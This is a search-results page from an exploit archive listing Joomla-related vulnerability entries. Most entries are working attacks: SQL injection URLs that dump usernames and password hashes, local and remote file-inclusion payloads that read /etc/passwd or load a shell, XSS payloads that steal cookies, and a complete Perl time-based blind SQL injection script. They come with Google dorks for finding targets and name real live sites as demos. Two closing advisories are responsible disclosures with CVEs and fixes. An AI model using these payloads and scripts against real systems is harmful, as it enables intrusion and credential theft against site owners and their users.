joomla 2.5
Search result for 'joomla 2.5'
(0.0426800251007 seconds)
Jakub Galczyk/Joomla 2.5.3 Information Disclosure ( na)
[ TITLE ....... ][ Joomla 2.5.3 information disclosure (tested for admin) [ DATE ........ ][ 01.04.2012 [ AUTOHR ...... ][ http://hauntit.blogspot.com [ SOFT LINK ... ][ http://joomla.org [ VERSION ..... ][ 2.5.3 [ TESTED ON ... ][ LAMP [ ----------------------------------------------------------------------- [ [ 1. What is this? [ 2. What is the type of vulnerability? [ 3. Where is bug :) [ 4. More... [--------------------------------------------[ [ 1. What is this? This is very nice CMS, You should try it! ;) [--------------------------------------------[ [ 2. What is the type of vulnerability? This is information disclosure bug for admin logged-in. [--------------------------------------------[ [ 3. Where is bug :) http://your.joomla/administrator/index.php?option=com_modules&view=positions&layout=modal&tmpl=component&function=jSelectPosition_jform_position&client_id=8%27];][][]%3E???%3E./8 Vulnerable parameter is client_id but "output" with information (disclosure bug) is available only in HTML source (so right-click, and view source for 'invalid' string to get information where Joomla is installed on remote server). By the way: You can set this parameter to non-existent ID (for example 11111111111). You should get the same response (in source, search for 'invalid'). [--------------------------------------------[ [ 4. More... - http://hauntit.blogspot.com - http://www.joomla.org - http://www.google.com - http://portswigger.net [ [--------------------------------------------[ [ All questions about new projects @ mail now :) ] [ Best regards [
Joomla version 2.5.3 suffers from an information disclosure vulnerability.
wishnusakti/Joomla Agora 2.5.x Pantheon Local File Inclusion ( na)
================================================================================================
Title : Joomla Component Agora (com_agora) LFI Vulnerability
Vendor : http://jvital.com
Download : http://jvitals.com/downloads/file/101-agora-pantheon
Version : 2.5.x Pantheon
Date : Sunday, July 4 2010 - GMT +07:00 Jakarta, Indonesia
Author : wishnusakti + inc0mp13te
Contact : wishnusakti[at]gmail.com
================================================================================================
[+] Vulnerable
$task = trim( JRequest::getVar('task', "") );
$task = str_replace( '../', '', $task );
if ($task)
{
require (AGORA_ROOT . "$task.php");
}
else
{
require ($agora_path . "/index.php");
}
[+] Exploit
http://[site]/[path]/index.php?option=com_agora&task=[LFI]
[+] PoC
http://localhost/index.php?option=com_agora&task=....//....//....//....//....//....//....//....//..../etc/passwd%0000
================================================================================================
Very Special thanks :
Penghuni priv8 Server
(ander, NoGe, zxvf, kaka11, s4va, meylira, Jack, aJe, Unyil, s4va, cheche angela zhang, madonk, & Bot² Scan :D)
en Semua Komunitas Hacking Tanah Air
Peace Yo :)
to all my friends :
cakill, aurell, hafiz, xco, xshadow,
gblack, krembis, biakkobar, hendri_note
================================================================================================
# ./wishnusakti + inc0mp13te
The Joomla Agora component version 2.5.x Pantheon suffers from a local file inclusion vulnerability.
Crim3R/Joomla 1.7 / 2.5 Civicrm Arbitrary File Upload ( na)
# Exploit Title: joomla 1.7 & 2.5 (com_civicrm) Arbitrary File Upload Vulnerability # Google Dork: inurl:/components/com_civicrm/ # Date: 08/22/2012 # Author: Crim3R # download Link : http://sourceforge.net/projects/civicrm/files/civicrm-stable/ # Tested on: all ================================== D3m0: http://artistic-webdesign.com/lynda/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/uploadtest.html http://pflagillinois.org/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html http://madacenter.com/mada/administrator/components/com_civicrm/civicrm/packages/fckeditor/editor/filemanager/connectors/test.html ===============Crim3R@Att.Net========= $Home = %00 thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir
Joomla versions 1.7 and 2.5 suffers from an arbitrary file upload vulnerability in the Civicrm component.
cO2/Joomla Component alphacontent <= 2.5.8 (id) SQL Injection Vulnerability ( php)
########################################## # # [ Joomla Component com_alphacontent SQL Injection ] # ########################################## [~] Vulnerability found by: cO2 [ Algeria Security Crew ] [~] Contact: c02[at]hotmail.de [~] Website: http://www.dzw0rm.ch [~] Greetings: to all hackers DZ ########################################## [~] ScriptName : 'Joomla' [~] ModuleName : 'AlphaContent' [~] Version() : '2.5.8 ' ########################################### # # DORK 1 : inurl: "com_alphacontent" # # DORK 2 : "AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr" # ########################################### [+]Exploit : index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/* ########################################### [+] : you can see the password in 'Title' ########################################### side note: <name>alphacontent</name> <creationDate>25 Jul 2007</creationDate> <author>Bernard Gilly</author> <copyright>This component is released under the GNU/GPL License.</copyright> <authorEmail>contact@visualclinic.fr</authorEmail> <authorUrl>www.visualclinic.fr</authorUrl> <version>2.5.8</version> <description>Directory component with alphabetical indexes for Joomla's Content</description> <name>alphacontent</name> <creationDate>16 Sept 2006</creationDate> <author>Bernard Gilly</author> <copyright>This component is released under the GNU/GPL License.</copyright> <authorEmail>contact@visualclinic.fr</authorEmail> <authorUrl>www.visualclinic.fr</authorUrl> <version>2.5.4</version> <description>Directory component and alphabetical indexes for Mambo/Joomla's Content</description> # milw0rm.com [2008-03-25]
mdx/Joomla Flash uploader 2.5.1 Remote File Inclusion Vulnerabilities ( php)
-------------------------------------------- = = = Mdx (c) 2007 = = = -------------------------------------------- = = =Joomla com_joomla_flash_uploader Remote File Include 2.5.1,2.5.2 = = ============================================ = = Download: = = http://download.joomlaportal.ch/content/view/1060/ = ============================================ = = Exploit: = administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell? = administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=shell? ============================================ = = =Tüm Ãslam Alemininin Bayramý Mubarek olsun = = ============================================ Thanks : Xoron,Deltaforce,Nizam-ül Mülk, Prime Suspect,CyberEx,mith,n0th!ng,CwPeker,Cyber_cobra,CyberWar,Musty @zr@il-,DaRKToLe,ultrAslan_CW,quantumhalil,schevko ,nirvana_jr,mertcesur,reddevil19,hocam,muhammed4554,WarriorHacker cepuzmani_53,kalaba,Dr.X --------------------------------------- # milw0rm.com [2007-10-11]
S@BUN/Mambo Component AkoGallery 2.5b SQL Injection Vulnerability ( php)
######################################################################### # # # joomla SQL Injection(com_akogallery) # ######################################################################### # # AUTHOR : S@BUN # # HOME : http://www.hackturkiye.com/ ######################################################################### # # DorKs 1 : allinurl: "com_akogallery" # ######################################################################## EXPLOIT : index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-334455/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/* index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/* ######################################################################### # S@BUN www.hackturkiye.com S@BUN ######################################################################### # S@BUN GOOD LUCKY S@BUN ######################################################################### <name>akogallery</name> <creationDate>21.06.2004</creationDate> <author>Arthur Konze</author> <copyright>Copyright 2003, 2004 by Arthur Konze. Distribution prohibited!</copyright> <authorEmail>webmaster@mamboportal.com</authorEmail> <authorUrl>www.mamboportal.com</authorUrl> <version>2.5 beta</version> <description>AkoGallery is a fully integrated Mambo picture gallery component.</description> # milw0rm.com [2008-01-31]
S@BUN/joomlaako-sql.txt ( na)
######################################################################### # # # joomla SQL Injection(com_akogallery) # ######################################################################### # # AUTHOR : S@BUN # # HOME : http://www.hackturkiye.com/ ######################################################################### # # DorKs 1 : allinurl: "com_akogallery" # ######################################################################## EXPLOIT : index.php?option=com_akogallery&Itemid=S@BUN&func=detail&id=-334455/**/union/**/select/**/null,null,concat(password,0x3a),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,concat(0x3a,username)/**/from/**/mos_users/* ######################################################################### # S@BUN www.hackturkiye.com S@BUN ######################################################################### # S@BUN GOOD LUCKY S@BUN ######################################################################### <name>akogallery</name> <creationDate>21.06.2004</creationDate> <author>Arthur Konze</author> <copyright>Copyright 2003, 2004 by Arthur Konze. Distribution prohibited!</copyright> <authorEmail>webmaster@mamboportal.com</authorEmail> <authorUrl>www.mamboportal.com</authorUrl> <version>2.5 beta</version> <description>AkoGallery is a fully integrated Mambo picture gallery component.</description>
The Joomla com_akogallery component version 2.5b suffers from a remote SQL injection vulnerability.
Alejandro Ramos/Joomla Time Based SQL Injection ( na)
#!/usr/bin/perl
# Thu Mar 15 22:55:32 CET 2012 A. Ramos <aramosf()unsec.net>
# www.securitybydefault.com
# Joomla <2.5.1 time based sql injection - vuln by Colin Wong
#
# using sleep() and not benchmark(), change for < mysql 5.0.12
#
# 1.- Database name: database()
# 2.- Users data table name: (change 'joomla' for database() result)
# select table_name from information_schema.tables where table_schema = "joomla" and table_name like "%_users"
# 3.- Admin password: (change zzz_users from previus sql query result)
# select password from zzzz_users limit 1
use strict;
use LWP::UserAgent;
$| = 1;
my $url = $ARGV[0];
my $wtime = $ARGV[1];
my $sql = $ARGV[2];
unless ($ARGV[2]) {
print "$0 <url> <wait time> <sql>\n";
print "\texamples:\n";
print "\t get admin password:\n";
print "\t\t$0 http://host/joomla/ 3 'database()'\n";
print "\t\t$0 http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema=\"joomla\" and table_name like \"%25_users\"\'\n";
print "\t\t$0 http://host/joomla/ 3 'select password from zzzz_users limit 1'\n";
print "\t get file /etc/passwd\n";
print "\t\t$0 http://host/joomla/ 3 'load_file(\"/etc/passwd\")'\n";
exit 1;
}
my ($len,$sqldata);
my $ua = LWP::UserAgent->new;
$ua->timeout(60);
$ua->env_proxy;
my $stime = time();
my $res = $ua->get($url);
my $etime = time();
my $regrtt = $etime - $stime;
print "rtt: $regrtt secs\n";
print "vuln?: ";
my $sleep = $regrtt + $wtime;
$stime = time();
$res = $ua->get($url."/index.php/404' union select sleep($sleep) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) { print "ok!\n"; } else { print "nope :(\n"; exit 1; }
my $lenoflen;
sub len {
# length of length
for (1..5) {
my $sql=$_[0];
$stime = time();
$res = $ua->get($url."/index.php/404' union select if(length(length(($sql)))=$_,sleep($wtime),null) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) {
$lenoflen = $_;
last;
}
}
for (1..$lenoflen) {
my $ll;
$ll=$_;
for (0..9) {
my $sql=$_[0];
$stime = time();
$res = $ua->get($url."/index.php/404' union select if(mid(length(($sql)),$ll,1)=$_,sleep($wtime),null) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) {
$len .= $_;
}
}
}
return $len;
}
sub data {
my $sql = $_[0];
my $len = $_[1];
my ($bit, $str, @byte);
my $high = 128;
for (1..$len) {
my $c=8;
@byte="";
my $a=$_;
for ($bit=1;$bit<=$high;$bit*=2) {
$stime = time();
# select if((ord(mid((load_file("/etc/passwd")),1,1)) & 64)=0,sleep(2),null) union select '1';
$res = $ua->get($url."/index.php/404' union select if((ord(mid(($sql),$a,1)) & $bit)=0,sleep($wtime),null) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) {
$byte[$c]="0";
} else { $byte[$c]="1"; }
$c--;
}
$str = join("",@byte);
print pack("B*","$str");
}
}
$len = len($sql);
print "$sql length: $len\n";
print "$sql data:\n\n";
data($sql,$len);
Joomla versions less than 2.5.1 time based SQL injection exploit.
mdx/joomlaflup-rfi.txt ( na)
-------------------------------------------- = = = Mdx (c) 2007 = = = -------------------------------------------- = = =Joomla com_joomla_flash_uploader Remote File Include 2.5.1,2.5.2 = = ============================================ = = Download: = = http://download.joomlaportal.ch/content/view/1060/ = ============================================ = = Exploit: = administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=shell? = administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=shell? ============================================ = = =Tüm Ýslam Alemininin Bayramý Mubarek olsun = = ============================================ Thanks : Xoron,Deltaforce,Nizam-ül Mülk, Prime Suspect,CyberEx,mith,n0th!ng,CwPeker,Cyber_cobra,CyberWar,Musty @zr@il-,DaRKToLe,ultrAslan_CW,quantumhalil,schevko ,nirvana_jr,mertcesur,reddevil19,hocam,muhammed4554,WarriorHacker cepuzmani_53,kalaba,Dr.X ---------------------------------------
Joomla Flash uploader version 2.5.1 is susceptible to remote file inclusion vulnerabilities.
c02/joomlaalphacon-sql.txt ( na)
########################################## # # [ Joomla Component com_alphacontent SQL Injection ] # ########################################## [~] Vulnerability found by: cO2 [ Algeria Security Crew ] [~] Contact: c02[at]hotmail.de [~] Website: http://www.dzw0rm.ch [~] Greetings: to all hackers DZ ########################################## [~] ScriptName : 'Joomla' [~] ModuleName : 'AlphaContent' [~] Version() : '2.5.8 ' ########################################### # # DORK 1 : inurl: "com_alphacontent" # # DORK 2 : "AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr" # ########################################### [+]Exploit : index.php?option=com_alphacontent&section=6&cat=15&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/* ########################################### [+] : you can see the password in 'Title' ########################################### side note: <name>alphacontent</name> <creationDate>25 Jul 2007</creationDate> <author>Bernard Gilly</author> <copyright>This component is released under the GNU/GPL License.</copyright> <authorEmail>contact@visualclinic.fr</authorEmail> <authorUrl>www.visualclinic.fr</authorUrl> <version>2.5.8</version> <description>Directory component with alphabetical indexes for Joomla's Content</description> <name>alphacontent</name> <creationDate>16 Sept 2006</creationDate> <author>Bernard Gilly</author> <copyright>This component is released under the GNU/GPL License.</copyright> <authorEmail>contact@visualclinic.fr</authorEmail> <authorUrl>www.visualclinic.fr</authorUrl> <version>2.5.4</version> <description>Directory component and alphabetical indexes for Mambo/Joomla's Content</description>
The Joomla AlphaContent component versions 2.5.8 and below suffer from a SQL injection vulnerability.
/russian-multi.txt ( na)
Dear bugtraq@securityfocus.com,
Vulnerabilities reported by different Russian speaking authors to
http://securityvulns.ru
1. Elekt(Antichat.ru) reports protection bypass vulnerability in PHP 4
and 5.
disable_functions feature can be bypassed by using functions alias. A
list of aliases is given in http://php.net/aliases/. For example,
ini_alter() may be used instead of ini_set() and vice versa.
SecurityVulns issue: http://securityvulns.com/news/PHP/alias-pb.html
Original message (in Russian): http://securityvulns.ru/Sdocument67.html
2. MustLive reports Crossite-Cripting vulnerability in WordPress
MultiUser 1.0
XSS is possible via Username form field.
Additional information (in Ukranian): http://websecurity.com.ua/1269/
Original message (in Russian): http://securityvulns.ru/Rdocument875.html
3. durito [NGH Group] reports multiple SQL injections in ActiveKB 1.5
Example:
http://www.example.com/activekb/index.php?ToDo=browse&catId=[SQL]
http://www.example.com/activekb/admin/index.php?ToDo=hideQuestion&questId=[SQL]
Original message (in Russian): http://securityvulns.ru/Rdocument901.html
4. MustLive reports Cross-Site Scripting vulnerability in Joomla! <= 1.0.13
An example of vulnerability is
http://site/index.php?option=com_search&searchword=';alert('XSS')//
Additional information (in Ukranian): http://websecurity.com.ua/1203/
Original message (in Russian): http://securityvulns.ru/Rdocument919.html
5. durito [NGH Group] reports crossite-scripting vulnerability in
ActiveKB NX 2.5.4
Example: http://www.example.com/activekb/ActiveKB/?page=[XXS]
Original message (in Russian): http://securityvulns.ru/Rdocument956.html
6. "noname indexed" reports vulnerability in UMI CMS (http://uni-cms.ru)
Vulnerability example:
http://example.com/search/search_do/?search_string=%22%20onmouseover=%22javacript:alert();
Original message (in Russian): http://securityvulns.ru/Rdocument957.html
7. MustLive reports cross-site scripting vulnerability in Nucleus.
Example: http://site/index.php?blogid=1&archive=2007-01-01%3Cscript%3Ealert(document.cookie)%3C/script%3E
Additional information (in Ukranian): http://websecurity.com.ua/1347/
Original message (in Russian): http://securityvulns.ru/Sdocument3.html
8. durito [NGH Group] reports
8.1 multiple SQL injections in Stride v1.0 Content Management System,
Merchant, Courses. Examples:
Content Management System
http://www.example.com/main.php?p=[SQL]
Merchant
http://www.example.com/shop.php?cmd=sto&id=[SQL]
Courses
http://www.example.com/detail.php?course=[SQL]
http://www.example.com/detail.php?provider=[SQL]
8.2 Information leak (FTP access account) with MyFTPUploader within
same applications. Example:
http://www.example.com/include/imageupload.js
contains
document.writeln('<param name="uploadDirectory" value="/public_html/dbimages/process">');
document.writeln('<param name="successURL" value="admin_imagemulti.php?action=process">');
document.writeln('<param name="host" value="www.target.com">');
document.writeln('<param name="userName" value="target">');
document.writeln('<param name="password" value="target">');
8.3 Default administrator's password for same applications.
Original message (in Russian): http://securityvulns.ru/Sdocument4.html
9. MustLive reports multiple crossite scripting vulnerabilities in
Site-Up <= 2.64
Via "search" and "search mask" fields of http://site/siteuprus/index.cgi:
Additional information (in Ukranian): http://websecurity.com.ua/1210/
Original message: (in Russian): http://securityvulns.ru/Sdocument12.html
10. MustLive reports crossite scripting in Google Search Appliance.
Example: http://site/search?ie=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&site=x&output=xml_no_dtd'&client=x&proxystylesheet=x'
Additional information (in Ukranian): http://websecurity.com.ua/1368/
Original message (in Russian): http://securityvulns.ru/Sdocument32.html
10. MustLive reports crossite scripting in PRO-search
Example: http://site/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Additional information (in Ukranian): http://websecurity.com.ua/1224/
Original message (in Russian): http://securityvulns.ru/Sdocument68.html
10. MustLive reports multiple vulnerabilities in Urchin Web Analytics
5.7.03.
In addition to re-discovered XSS vulnerability, there is also
authentication bypass (access without username/password).
Example: http://site:10000/report.cgi?profile=x&rid=42&prefs=x&n=10&vid=1301&bd=20070703&ed=20070703&dt=4&gtype=5
Additional information (in Ukranian): http://websecurity.com.ua/1283/
Original message: (in Russian): http://securityvulns.ru/Sdocument90.html
11. MustLive reports crossite scripting vulnerability in Mozilla Firefox
<= 2.0 with gopher: protocol URL if UTF-7 if page content is displayed as
UTF-7. Examples:
For Firefox before 2.0:
gopher:///1+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-
gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw-SCRIPT+AD4-alert('XSS')+ADw-/SCRIPT+AD4-
For Firefox 2.0:
gopher:///1+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-
gopher:///1Turn%20on%20UTF-7%20to%20view%20this%20message%20+ADw-SCRIPT+AD4-alert(/XSS/)+ADw-/SCRIPT+AD4-
According to author, it's possible to execute script in both local zone
and context of gopher site.
12. ShAnKaR reports PHP Zend Hash vulnerability exploitation vector
with Drupal <= 5.2.
Example: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();
Original message (in Russian): http://securityvulns.ru/Sdocument137.html
13. ShAnKaR reports PHP injection vulnerability in TikiWiki 1.9.8.
Example: http://www.example.com/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=
Original message (in Russian):
http://securityvulns.ru/Sdocument162.html
Also, multiple vulnerabilities were reported in English by
:: iNs @ uNkn0wn.eu :: http://securityvulns.com/source26994.html
and
r0t: http://securityvulns.com/source12948.html
--
http://securityvulns.com/
/\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
|/
Multiple vulnerabilities from Russian blogs have been aggregated. These findings discuss vulnerabilities in PHP versions 4 and 5, WordPress MultiUser version 1.0, ActiveKB version 1.5, Joomla! versions 1.0.13 and below, ActiveKB NX version 2.5.4, UMI CMS, Nucleus, Stride CMS versions 1.0, and more. Exploitation details provided.
kaMtiEz/Joomla DMS SQL Injection ( na)
/************************************************************************** [~] Joomla Component com_dms Remote SQL injection vulnerability - (category_id) [~] Author : kaMtiEz (kamzcrew@yahoo.com) [~] Homepage : http://www.indonesiancoder.com [~] Date : 28 January, 2010 **************************************************************************/ [ Software Information ] [+] Vendor : http://joomdonation.com/ [+] Info : http://joomdonation.com/index.php?option=com_content&view=article&id=41&Itemid=40 [+] version : 2.5.1 or lower maybe also affected [+] Vulnerability : SQL injection [+] Dork : inurl:"com_dms" [+] Type : commercial =========================================================================== [ Vulnerable File ] http://127.0.0.1//index.php?option=com_dms&task=view_category&category_id=[INDONESIANCODER] [ Exploit ] -666+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users-- [ Demo ] http://dms.joomdonation.com/index.php?option=com_dms&task=view_category&category_id=-666+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users-- =========================================================================== [ Thx TO ] [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah [+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack [+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk [ NOTE ] [+] Babe enyak adek i love u pull dah .. [+] Bercinta Sekuat Tenaga ! [+] rm -rf [ QUOTE ] [+] we are not dead INDONESIANCODER stil r0x [+] nothing secure ..
The Joomla DMS component suffers from a remote SQL injection vulnerability.
AtT4CKxT3rR0r1ST/Joomla Pony Gallery Remote File Inclusion ( na)
Joomla Component com_ponygallery Multiple Remote File Include ============================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn] .:. Script : http://www.joomlaos.de/option,com_remository/Itemid,41/func,download/id,2874/chk,9056372cb7b40c9809ba7070ffde09f3/no_html,1/fname,PONYGALLERY_ML_2_5_1_INSTALL.zip.html .:. Dork : inurl:"com_ponygallery" #################################################################### ===[ Exploit ]=== www.site.com/components/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=[shell.txt?] www.site.com/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=[shell.txt?] ####################################################################
The Joomla Pony Gallery component suffers from a remote file inclusion vulnerability.
EgiX/Joomla! 3.0.2 PHP Object Injection ( na)
-------------------------------------------------------------------
Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability
-------------------------------------------------------------------
[-] Software Link:
http://www.joomla.org/
[-] Affected Versions:
Version 3.0.2 and earlier 3.0.x versions.
Version 2.5.8 and earlier 2.5.x versions.
[-] Vulnerability Description:
The vulnerable code is located in /plugins/system/highlight/highlight.php:
56. // Get the terms to highlight from the request.
57. $terms = $input->request->get('highlight', null, 'base64');
58. $terms = $terms ? unserialize(base64_decode($terms)) : null;
User input passed through the "highlight" parameter is not properly sanitized before being used in
an unserialize() call at line 58. This can be exploited to inject arbitrary PHP objects into the
application scope. Successful exploitation of this vulnerability doesn't require authentication,
but requires the "System Highlight" plugin to be enabled (such as by default configuration).
[-] Solution:
Upgrade to version 3.0.3 or 2.5.9.
[-] Disclosure Timeline:
[31/10/2012] - Vendor notified
[08/11/2012] - Vendor asked for a proof of concept
[08/11/2012] - Proof of concept provided to the vendor
[04/02/2013] - Vendor update released
[27/02/2013] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2013-1453 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2013-03
Joomla! versions 3.0.2 and below suffer from a PHP object injection vulnerability in highlight.php.
EgiX/Joomla! 3.0.3 PHP Object Injection ( na)
------------------------------------------------------------------
Joomla! <= 3.0.3 (remember.php) PHP Object Injection Vulnerability
------------------------------------------------------------------
[-] Software Link:
http://www.joomla.org/
[-] Affected Versions:
Version 3.0.3 and earlier 3.0.x versions.
Version 2.5.9 and earlier 2.5.x versions.
[-] Vulnerability Description:
The vulnerable code is located in /plugins/system/remember/remember.php:
34. $hash = JApplication::getHash('JLOGIN_REMEMBER');
35.
36. if ($str = JRequest::getString($hash, '', 'cookie', JREQUEST_ALLOWRAW | JREQUEST_NOTRIM))
37. {
38. // Create the encryption key, apply extra hardening using the user agent string.
39. // Since we're decoding, no UA validity check is required.
40. $privateKey = JApplication::getHash(@$_SERVER['HTTP_USER_AGENT']);
41.
42. $key = new JCryptKey('simple', $privateKey, $privateKey);
43. $crypt = new JCrypt(new JCryptCipherSimple, $key);
44. $str = $crypt->decrypt($str);
45. $cookieData = @unserialize($str);
User input passed through cookies is not properly sanitized before being used in an unserialize()
call at line 45. This could be exploited to inject arbitrary PHP objects into the application scope.
Successful exploitation of this vulnerability requires authentication because the attacker needs
to know the "hash string" used to read the cookie parameter at line 36.
[-] Solution:
Upgrade to version 2.5.10, 3.0.4 or 3.1.0.
[-] Disclosure Timeline:
[04/12/2012] - Vendor alerted for a possible vulnerability
[13/02/2013] - Vulnerability confirmed and proof of concept sent to the vendor
[24/04/2013] - Vendor update released
[26/04/2013] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2013-3242 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2013-04
Joomla! versions 3.0.3 and below suffer from a PHP object injection vulnerability in remember.php.